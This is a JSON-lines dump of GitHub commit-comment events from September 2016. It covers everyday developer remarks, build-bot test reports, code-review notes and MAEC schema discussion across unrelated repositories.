{"id":"4522482586","type":"CommitCommentEvent","actor":{"login":"robertrdfrd"},"repo":{"name":"gruzzlymug/planner-original"},"payload":{"comment":{"id":18914314,"position":null,"line":null,"path":null,"commit_id":"18989363bdb0ca30ce4c095e35f8e6deecc62bc2","created_at":"2016-09-06T16:43:08Z","updated_at":"2016-09-06T16:43:08Z","body":"This is not working!\r\n\r\nWhere is defun make-vertex-key or make-vertex?"}},"created_at":"2016-09-06T16:43:08Z"}
{"id":"4522483887","type":"CommitCommentEvent","actor":{"login":"sosiouxme"},"repo":{"name":"jcantrill/origin"},"payload":{"comment":{"id":18914333,"position":59,"line":59,"path":"pkg/diagnostics/cluster/aggregated_logging.go","commit_id":"956098049ed08f17edf0616f73bec03814f35993","created_at":"2016-09-06T16:43:20Z","updated_at":"2016-09-06T16:43:20Z","body":"the other place being https://github.com/openshift/origin/blob/master/pkg/diagnostics/cluster/service_externalip.go#L35"}},"created_at":"2016-09-06T16:43:20Z"}
{"id":"4522484082","type":"CommitCommentEvent","actor":{"login":"apinela"},"repo":{"name":"Grouper-AOSP/android_device_asus_grouper"},"payload":{"comment":{"id":18914337,"position":null,"line":null,"path":null,"commit_id":"e6e43a0ff419a00b9343a808f38aa82870a4d683","created_at":"2016-09-06T16:43:22Z","updated_at":"2016-09-06T16:43:22Z","body":"@airend we dont need this, it is set here: https://github.com/Grouper-AOSP/android_device_asus_grouper/blob/omni-7.0/omni_grouper.mk#L40"}},"created_at":"2016-09-06T16:43:22Z"}
{"id":"4522487089","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"airend/proprietary_vendor_lge_hammerhead"},"payload":{"comment":{"id":18914367,"position":null,"line":null,"path":null,"commit_id":"3f3f48ba36337d9495b1f666983ff463d19ee4ad","created_at":"2016-09-06T16:43:54Z","updated_at":"2016-09-06T16:43:54Z","body":"@airend \r\nThis spam at all AOSP 7 except BOKROM, and one infection comrade, closed source code ...\r\nWhat I have written above in logkate me every millisecond indefinitely....\r\n\r\nlink for problem:\r\nhttp://forum.xda-developers.com/showpost.php?p=68529470&postcount=1450\r\n\r\n\r\nIn search of solutions for Nitrogen OS..."}},"created_at":"2016-09-06T16:43:54Z"}
{"id":"4522487432","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18914381,"position":null,"line":null,"path":null,"commit_id":"1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf","created_at":"2016-09-06T16:43:58Z","updated_at":"2016-09-06T16:43:58Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-MacOS-10.9-clang: OK (2318 of 2328 tests passed, 1 test warnings)\n\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 5 tests had: MTR big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: ESO small diffs.\n * 1 test had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ce1a5106c9f0fbe1ffe4849879a35a3f3a2f9cf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T16:43:58Z"}
{"id":"4522488302","type":"CommitCommentEvent","actor":{"login":"File14"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18914414,"position":null,"line":null,"path":null,"commit_id":"f4c6154e6ae78b17ccd1450b950bb3f06668b49d","created_at":"2016-09-06T16:44:09Z","updated_at":"2016-09-06T16:44:09Z","body":"Failed?"}},"created_at":"2016-09-06T16:44:09Z"}
{"id":"4522490276","type":"CommitCommentEvent","actor":{"login":"blookvoodow"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18914446,"position":null,"line":null,"path":null,"commit_id":"756fd9e195dca426ba2fc4629b19ea2cfabc201d","created_at":"2016-09-06T16:44:29Z","updated_at":"2016-09-06T16:44:29Z","body":"Im at work but ill definately test this later today"}},"created_at":"2016-09-06T16:44:29Z"}
{"id":"4522495989","type":"CommitCommentEvent","actor":{"login":"pelikhan"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18914577,"position":null,"line":null,"path":null,"commit_id":"8b6e3a1fcdaf05b8a47899497f4099c24c997f7c","created_at":"2016-09-06T16:45:28Z","updated_at":"2016-09-06T16:45:28Z","body":"My experience is that it is annoying to add those files to the project. I guess the proper fix should be to add them to pxt.json automatically as needed.\r\n\r\nFrom: Michał Moskal [mailto:notifications@github.com]\r\nSent: Tuesday, September 6, 2016 9:09 AM\r\nTo: Microsoft/pxt <pxt@noreply.github.com>\r\nCc: Peli de Halleux <jhalleux@microsoft.com>; Mention <mention@noreply.github.com>\r\nSubject: Re: [Microsoft/pxt] updated new project template (8b6e3a1)\r\n\r\n\r\n@pelikhan<https://github.com/pelikhan> I'm not sure about the shims.d.ts and enums.d.ts in the default project. They are only needed if the project contains C++, and as I see from existing examples most don't. People have to add the C++ file references manually anyway, so maybe they can also add shims.d.ts?\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/Microsoft/pxt/commit/8b6e3a1fcdaf05b8a47899497f4099c24c997f7c#commitcomment-18913815>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AD-4KYL82wduk8xm5S-47MH3uc0DxWm7ks5qnZAEgaJpZM4J2Asf>.\r\n"}},"created_at":"2016-09-06T16:45:28Z"}
{"id":"4522497560","type":"CommitCommentEvent","actor":{"login":"jsteube"},"repo":{"name":"hashcat/hashcat"},"payload":{"comment":{"id":18914592,"position":null,"line":null,"path":null,"commit_id":"e4bf86dcbef100c57fb6532c10fbc9227f940693","created_at":"2016-09-06T16:45:45Z","updated_at":"2016-09-06T16:45:45Z","body":"please note @KOLANICH "}},"created_at":"2016-09-06T16:45:45Z"}
{"id":"4522499615","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914635,"position":31,"line":31,"path":"examples/av_classifications_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:46:10Z","updated_at":"2016-09-06T16:46:10Z","body":"These look good! This is still notional, but I think we'll want to move them into a MAEC specific extension of the CybOX 3.0 File Object. Something like:\r\n\r\n{\r\n      \"type\":\"file\",\r\n      \"hashes\":{\r\n        \"md5\":\"4472ea40dc71e5bb701574ea215a81a1\"\r\n      },\r\n      \"size\":25536,\r\n      \"file_name\":\"foo.dll\",\r\n      \"extended_properties\":{\"maec-av-class\":[...classifications go here...]}\r\n      }\r\n}"}},"created_at":"2016-09-06T16:46:10Z"}
{"id":"4522500046","type":"CommitCommentEvent","actor":{"login":"soezdemir"},"repo":{"name":"htwsoft/VS1"},"payload":{"comment":{"id":18914646,"position":null,"line":null,"path":null,"commit_id":"f908115366ab2bb7f2c4b8dddc5531ea2fdc2703","created_at":"2016-09-06T16:46:14Z","updated_at":"2016-09-06T16:46:14Z","body":"Alles compilen aus dem RMIFS Ordner\r\nanschließen in korrekter Reihenfolge FileSystemServer, \r\nVerwalterServer und FileSystemClient starten mit Port \r\nals Parameter (siehe unten) \r\n\r\nServer = Port 1090\r\nVerwalter = Port 1091\r\nClient  = Port 1091 localhost\r\n\r\n\r\nDas einzige was noch fehtl ist der Verbindungsabbau des Clients vom VerwalterServer (zum Beispiel einen neue Verbindung zu einem anderen Vewalter). Wird aber noch die Tage erledigt von uns"}},"created_at":"2016-09-06T16:46:14Z"}
{"id":"4522503050","type":"CommitCommentEvent","actor":{"login":"stden"},"repo":{"name":"vika-max/java_levelp"},"payload":{"comment":{"id":18914687,"position":9,"line":9,"path":"Task1/src/com/company/Main.java","commit_id":"3c8852391b835eabc24189ee3abaf511f91b91e3","created_at":"2016-09-06T16:46:45Z","updated_at":"2016-09-06T16:46:45Z","body":"Если нет причины экономить память, используйте double"}},"created_at":"2016-09-06T16:46:45Z"}
{"id":"4522505223","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914701,"position":10,"line":26,"path":"examples/maec_related_malware.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:47:05Z","updated_at":"2016-09-06T16:47:05Z","body":"(Same comment as in the AV Classifications example)\r\n\r\nWe should update these examples to use the latest versions of the CybOX 3.0 specification. For the File Object, this would be: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#heading=h.99bl2dibcztv"}},"created_at":"2016-09-06T16:47:05Z"}
{"id":"4522509178","type":"CommitCommentEvent","actor":{"login":"JamesEarle"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18914728,"position":null,"line":null,"path":null,"commit_id":"9f4159c05385e6db8f85b5eea91fb99b597d5beb","created_at":"2016-09-06T16:47:49Z","updated_at":"2016-09-06T16:47:49Z","body":"Should this file be top level? I feel like it should be with the models somewhere"}},"created_at":"2016-09-06T16:47:49Z"}
{"id":"4522513575","type":"CommitCommentEvent","actor":{"login":"rason00"},"repo":{"name":"rason00/Rason-Resume"},"payload":{"comment":{"id":18914799,"position":null,"line":null,"path":null,"commit_id":"1ea8ba1b5d9d0b0691ac9985c82b294cfa5cd2cc","created_at":"2016-09-06T16:48:39Z","updated_at":"2016-09-06T16:48:39Z","body":"1"}},"created_at":"2016-09-06T16:48:39Z"}
{"id":"4522514411","type":"CommitCommentEvent","actor":{"login":"LucianoZu"},"repo":{"name":"openQCM/openQCM2"},"payload":{"comment":{"id":18914806,"position":24,"line":164,"path":"openqcm-core/src/main/java/org/openqcm/core/ArdulinkConnector.java","commit_id":"38f73c8df92c272f4631037770c0f64ea4b8c0bd","created_at":"2016-09-06T16:48:49Z","updated_at":"2016-09-06T16:48:49Z","body":"Devi cancellare il vecchio jar extended features e mettere il nuovo\n\nIl 06 set 2016 6:28 PM, \"Marco Mauro\" <notifications@github.com> ha scritto:\n\n> error: incompatible types: Link cannot be converted to AbstractListenerLink\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/openQCM/openQCM2/commit/38f73c8df92c272f4631037770c0f64ea4b8c0bd#commitcomment-18914085>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI3KTNihtwFlG6au1-zaHp0tLiydtLbQks5qnZSdgaJpZM4J2B6M>\n> .\n>\n"}},"created_at":"2016-09-06T16:48:49Z"}
{"id":"4522516262","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18914810,"position":null,"line":null,"path":null,"commit_id":"cd470ff03814d4fedbb03737ff802c8cc3dbfad4","created_at":"2016-09-06T16:49:10Z","updated_at":"2016-09-06T16:49:10Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vtTxQgCY&#x2F;37-sort-coworkers-by-surname\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Sort coworkers by surname</a>"}},"created_at":"2016-09-06T16:49:10Z"}
{"id":"4522518517","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18914816,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T16:49:35Z","updated_at":"2016-09-06T16:49:35Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2359 of 2367 tests passed, 25 test warnings)\n\n * 4 tests had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 8 tests had: Table big diffs.\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T16:49:35Z"}
{"id":"4522519694","type":"CommitCommentEvent","actor":{"login":"ncoghlan"},"repo":{"name":"ilevkivskyi/peps"},"payload":{"comment":{"id":18914822,"position":107,"line":107,"path":"pep-0555.txt","commit_id":"c69984790bd20fb4e164cb8efd0be36d0fcf65f3","created_at":"2016-09-06T16:49:46Z","updated_at":"2016-09-06T16:49:46Z","body":"General principles of type hints in Python:\r\n\r\n* type hints *constrain* target bindings during type checking: the expression being bound must conform to the annotation of the target (whether that target is a variable name, an attribute, a function parameter, or a function return value)\r\n* the binding constraint means type hints allow inference engines to *assume* that the type hint is correct, rather than needing to perform further inference on the specific expressions bound to it (which may not even be known during static analysis, as is the case for function parameter binding and assignment to public class and instance attributes)\r\n"}},"created_at":"2016-09-06T16:49:46Z"}
{"id":"4522519816","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914824,"position":120,"line":120,"path":"examples/package_action_equivalency_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:49:47Z","updated_at":"2016-09-06T16:49:47Z","body":"(Same comment as in the AV Classifications example)\r\n\r\nWe should update these examples to use the latest versions of the CybOX 3.0 specification. For the File Object, this would be: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#heading=h.99bl2dibcztv"}},"created_at":"2016-09-06T16:49:47Z"}
{"id":"4522520695","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914830,"position":43,"line":43,"path":"examples/static_triage_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:49:57Z","updated_at":"2016-09-06T16:49:57Z","body":"(Same comment as in the AV Classifications example)\r\n\r\nWe should update these examples to use the latest versions of the CybOX 3.0 specification. For the File Object, this would be: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#heading=h.99bl2dibcztv"}},"created_at":"2016-09-06T16:49:57Z"}
{"id":"4522522304","type":"CommitCommentEvent","actor":{"login":"stden"},"repo":{"name":"vika-max/java_levelp"},"payload":{"comment":{"id":18914840,"position":19,"line":19,"path":"Task1/src/com/company/Main.java","commit_id":"3c8852391b835eabc24189ee3abaf511f91b91e3","created_at":"2016-09-06T16:50:18Z","updated_at":"2016-09-06T16:50:18Z","body":"Нужно сравнивать floating point types (float / double) с учётом погрешности вычислений"}},"created_at":"2016-09-06T16:50:18Z"}
{"id":"4522522932","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18914844,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T16:50:24Z","updated_at":"2016-09-06T16:50:24Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T16:50:24Z"}
{"id":"4522523470","type":"CommitCommentEvent","actor":{"login":"yylxy"},"repo":{"name":"yylxy/My-Animator"},"payload":{"comment":{"id":18914846,"position":null,"line":null,"path":null,"commit_id":"faca20c6adc833f3341828504ae5bac5f8312dba","created_at":"2016-09-06T16:50:29Z","updated_at":"2016-09-06T16:50:29Z","body":"ggggggggggg"}},"created_at":"2016-09-06T16:50:29Z"}
{"id":"4522524205","type":"CommitCommentEvent","actor":{"login":"yylxy"},"repo":{"name":"yylxy/My-Animator"},"payload":{"comment":{"id":18914849,"position":null,"line":null,"path":null,"commit_id":"faca20c6adc833f3341828504ae5bac5f8312dba","created_at":"2016-09-06T16:50:36Z","updated_at":"2016-09-06T16:50:36Z","body":"gggggggg"}},"created_at":"2016-09-06T16:50:36Z"}
{"id":"4522524226","type":"CommitCommentEvent","actor":{"login":"derazo"},"repo":{"name":"haerazo/taller"},"payload":{"comment":{"id":18914850,"position":30,"line":30,"path":"src/colorobserver/ColorObserver.java","commit_id":"5a547f325a4b1737ded5da2c114ccc4ba4077d65","created_at":"2016-09-06T16:50:37Z","updated_at":"2016-09-06T16:50:37Z","body":"hola"}},"created_at":"2016-09-06T16:50:37Z"}
{"id":"4522524677","type":"CommitCommentEvent","actor":{"login":"yylxy"},"repo":{"name":"yylxy/My-Animator"},"payload":{"comment":{"id":18914851,"position":null,"line":null,"path":null,"commit_id":"faca20c6adc833f3341828504ae5bac5f8312dba","created_at":"2016-09-06T16:50:40Z","updated_at":"2016-09-06T16:50:40Z","body":"ggggggg"}},"created_at":"2016-09-06T16:50:40Z"}
{"id":"4522526426","type":"CommitCommentEvent","actor":{"login":"rwinch"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":18914860,"position":null,"line":null,"path":null,"commit_id":"3fb77f3b59b781e26b9ae249810ecdfba6306ee8","created_at":"2016-09-06T16:51:01Z","updated_at":"2016-09-06T16:51:01Z","body":"@jeetmp3 Yes. It doesn't really make sense to use `isEmpty` for non collection based objects. You can use a not null check and accomplish the same thing."}},"created_at":"2016-09-06T16:51:01Z"}
{"id":"4522530484","type":"CommitCommentEvent","actor":{"login":"stden"},"repo":{"name":"vika-max/java_levelp"},"payload":{"comment":{"id":18914872,"position":18,"line":18,"path":"Task1/src/com/company/Main.java","commit_id":"3c8852391b835eabc24189ee3abaf511f91b91e3","created_at":"2016-09-06T16:51:46Z","updated_at":"2016-09-06T16:51:46Z","body":"Выводить процесс решения. Вывести дискриминант = ... "}},"created_at":"2016-09-06T16:51:46Z"}
{"id":"4522533769","type":"CommitCommentEvent","actor":{"login":"Velocet"},"repo":{"name":"adadgio/safari-reader-js"},"payload":{"comment":{"id":18914884,"position":null,"line":null,"path":null,"commit_id":"3219c45ce28e94898a126e6ff1a7c64ac793c257","created_at":"2016-09-06T16:52:23Z","updated_at":"2016-09-06T16:52:23Z","body":"Can't make a commit to the other file since it's just a download from the blog ;)"}},"created_at":"2016-09-06T16:52:23Z"}
{"id":"4522538156","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18914890,"position":null,"line":null,"path":null,"commit_id":"84a13124e2507b16b90411d9fdd25954875d288a","created_at":"2016-09-06T16:53:14Z","updated_at":"2016-09-06T16:53:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;sSTfMWQz&#x2F;15-add-editorconfig-to-format-other-files-then-typescript\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add editorconfig to format other files then typescript</a>"}},"created_at":"2016-09-06T16:53:14Z"}
{"id":"4522539052","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18914894,"position":15,"line":166,"path":"README.md","commit_id":"7a153236df62c9e21dc2597cf23585d0b5a03abd","created_at":"2016-09-06T16:53:23Z","updated_at":"2016-09-06T16:53:23Z","body":"I actually got used to pressing F1 instead of ctrl+shift+P without even noticing, so may be it's worth noting this easy shortcut."}},"created_at":"2016-09-06T16:53:23Z"}
{"id":"4522548081","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18914920,"position":null,"line":null,"path":null,"commit_id":"d70ec52d9ff1f1c8fa27c8e9057a821461f9837e","created_at":"2016-09-06T16:55:02Z","updated_at":"2016-09-06T16:55:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 936](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12773&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T16:55:02Z"}
{"id":"4522552411","type":"CommitCommentEvent","actor":{"login":"lianeincha"},"repo":{"name":"lianeincha/do_something"},"payload":{"comment":{"id":18914927,"position":null,"line":null,"path":null,"commit_id":"752de39934c9873ea559ecb123d03b06c60beacf","created_at":"2016-09-06T16:55:49Z","updated_at":"2016-09-06T16:55:49Z","body":"What to do?"}},"created_at":"2016-09-06T16:55:49Z"}
{"id":"4522553695","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914949,"position":26,"line":32,"path":"examples/in_depth_analysis.json","commit_id":"9e8ee78a52791363224e0b0818874c2073255938","created_at":"2016-09-06T16:56:03Z","updated_at":"2016-09-06T16:56:03Z","body":"We should update these with \"real\" CybOX 3.0 Objects, using the latest versions of the CybOX 3.0 specification. For the File Object, this would be: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#heading=h.99bl2dibcztv"}},"created_at":"2016-09-06T16:56:03Z"}
{"id":"4522554727","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18914951,"position":6,"line":0,"path":"truffle/src/main/ruby/core/truffle/cext.rb","commit_id":"9edb5f9bf3e89dff34deb430693050420b222ed8","created_at":"2016-09-06T16:56:16Z","updated_at":"2016-09-06T16:56:16Z","body":"Done."}},"created_at":"2016-09-06T16:56:16Z"}
{"id":"4522556073","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914954,"position":8,"line":21,"path":"examples/package_capability.json","commit_id":"9e8ee78a52791363224e0b0818874c2073255938","created_at":"2016-09-06T16:56:29Z","updated_at":"2016-09-06T16:56:29Z","body":"We should update these with \"real\" CybOX 3.0 Objects, using the latest versions of the CybOX 3.0 specification. For the File Object, this would be: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#heading=h.99bl2dibcztv"}},"created_at":"2016-09-06T16:56:29Z"}
{"id":"4522556516","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18914956,"position":15,"line":166,"path":"README.md","commit_id":"7a153236df62c9e21dc2597cf23585d0b5a03abd","created_at":"2016-09-06T16:56:34Z","updated_at":"2016-09-06T16:56:34Z","body":"Wow, I had no idea that's a thing..."}},"created_at":"2016-09-06T16:56:34Z"}
{"id":"4522560159","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18914960,"position":null,"line":null,"path":null,"commit_id":"632d15ad4ea3b03af233a9d80fd59ea0283ccba5","created_at":"2016-09-06T16:57:18Z","updated_at":"2016-09-06T16:57:18Z","body":"To PRE."}},"created_at":"2016-09-06T16:57:18Z"}
{"id":"4522560936","type":"CommitCommentEvent","actor":{"login":"mtaufen"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":18914963,"position":8,"line":43,"path":"pkg/kubelet/kubelet.go","commit_id":"f277205f4fde9f6a540e196b12d9832569b07d8f","created_at":"2016-09-06T16:57:23Z","updated_at":"2016-09-06T16:57:23Z","body":"https://github.com/kubernetes/kubernetes/pull/32137"}},"created_at":"2016-09-06T16:57:23Z"}
{"id":"4522560925","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18914964,"position":null,"line":null,"path":null,"commit_id":"248d28ea68dae3646317ae2e0477a9866018776f","created_at":"2016-09-06T16:57:24Z","updated_at":"2016-09-06T16:57:24Z","body":"+1"}},"created_at":"2016-09-06T16:57:24Z"}
{"id":"4522564381","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18914972,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T16:58:04Z","updated_at":"2016-09-06T16:58:04Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-06T16:58:04Z"}
{"id":"4522566169","type":"CommitCommentEvent","actor":{"login":"stden"},"repo":{"name":"vika-max/java_levelp"},"payload":{"comment":{"id":18914976,"position":5,"line":5,"path":"Task_3/src/Bracket.java","commit_id":"04514672548353dc6fb80a2ae1ee27ec62fbd2da","created_at":"2016-09-06T16:58:25Z","updated_at":"2016-09-06T16:58:25Z","body":" if (c_out == n && c_close == n) {  // Нужно чтобы открывающих было n и закрывающих n "}},"created_at":"2016-09-06T16:58:25Z"}
{"id":"4522567829","type":"CommitCommentEvent","actor":{"login":"rhoit"},"repo":{"name":"rhoit/my-config"},"payload":{"comment":{"id":18914978,"position":null,"line":null,"path":null,"commit_id":"23c7945763e730d246894cbd7fa4ddf4682ce8b4","created_at":"2016-09-06T16:58:45Z","updated_at":"2016-09-06T16:58:45Z","body":"in theory yes, but couldn't get it working, did you get it working?"}},"created_at":"2016-09-06T16:58:45Z"}
{"id":"4522569400","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18914982,"position":null,"line":null,"path":null,"commit_id":"a29f09e94d24fe12d00debfcb6e7830970536114","created_at":"2016-09-06T16:59:00Z","updated_at":"2016-09-06T16:59:00Z","body":"Neat job! Good luck for LTC!"}},"created_at":"2016-09-06T16:59:00Z"}
{"id":"4522570771","type":"CommitCommentEvent","actor":{"login":"ncoghlan"},"repo":{"name":"ilevkivskyi/peps"},"payload":{"comment":{"id":18914984,"position":151,"line":151,"path":"pep-0555.txt","commit_id":"c69984790bd20fb4e164cb8efd0be36d0fcf65f3","created_at":"2016-09-06T16:59:16Z","updated_at":"2016-09-06T16:59:16Z","body":"Potentially worth referencing https://www.grinchcentral.com/why-types-are-not-documentation as a call to not be overly gung ho with type annotations in public libraries and frameworks (as opposed to end user focused applications and private code bases)"}},"created_at":"2016-09-06T16:59:16Z"}
{"id":"4522576220","type":"CommitCommentEvent","actor":{"login":"havardgulldahl"},"repo":{"name":"havardgulldahl/jottalib"},"payload":{"comment":{"id":18914998,"position":null,"line":null,"path":null,"commit_id":"a02c6ee173df09cb0ddc05e65360f0950b723756","created_at":"2016-09-06T17:00:18Z","updated_at":"2016-09-06T17:00:18Z","body":"Yea, I was too quick to merge without considering backwards compability :/ \r\nWell, we'll fix it now! :)"}},"created_at":"2016-09-06T17:00:18Z"}
{"id":"4522578212","type":"CommitCommentEvent","actor":{"login":"ncoghlan"},"repo":{"name":"ilevkivskyi/peps"},"payload":{"comment":{"id":18915002,"position":null,"line":null,"path":null,"commit_id":"c69984790bd20fb4e164cb8efd0be36d0fcf65f3","created_at":"2016-09-06T17:00:39Z","updated_at":"2016-09-06T17:00:39Z","body":"I like this outline, although it's going to take quite a while to fill in :)\r\n\r\nThe \"general principles\" note is my main takeaway from the PEP 526 discussions."}},"created_at":"2016-09-06T17:00:39Z"}
{"id":"4522588732","type":"CommitCommentEvent","actor":{"login":"vlastachu"},"repo":{"name":"dialekz/TelephoneStation"},"payload":{"comment":{"id":18915037,"position":6,"line":79,"path":"src/main/java/models/Service.java","commit_id":"da7134f6d85abd36718e64393a772ac8ba19438b","created_at":"2016-09-06T17:02:28Z","updated_at":"2016-09-06T17:02:28Z","body":"http://ideone.com/kVyksY"}},"created_at":"2016-09-06T17:02:28Z"}
